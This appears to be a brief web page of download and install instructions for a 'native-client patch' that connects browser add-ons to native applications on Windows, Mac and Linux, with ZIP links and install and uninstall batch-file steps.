Native-Client patch for Window, Linux and Mac
How to work with native-client:
Native client patch is used for connecting your browser (Firefox, Chrome and Opera) with native applications on your machine (Windows, Linux and Mac). If you have an add-on in your browser that needs to communicate with an external application on your computer, this native client patch can be used to easily make this connection.
In order to install “native-client” on your system please follow the below steps.
- Download and extract the related ZIP file to your machine. If you have windows OS, please download “win.zip”, for Mac OS, use “mac.zip” and for Linux please use “linux.zip”.
- Open the downloaded folder and then click on “install.bat”. You can open “install.bat” with any text editor to see the inside in case you are interested.
- Wait for the screen to display the successful message.
- Now the add-on in your browser is fully connected to native applications (i.e. a media player) on your machine.
In order to uninstall “native-client” from your system, please follow the below steps.
- Open the downloaded folder and then click on “uninstall.bat”.
- Wait for the script to display the successful message.
- Windows: Copy this link and paste it into your web browser to download the file: http://borwi.com/wp-content/uploads/2021/04/win-2.zip
- Mac OS: Copy this link and paste it into your web browser to download the file: http://borwi.com/wp-content/uploads/2021/04/macbook.zip
- Linux: Copy this link and paste it into your web browser to download the file: http://borwi.com/wp-content/uploads/2021/04/linux-2.zip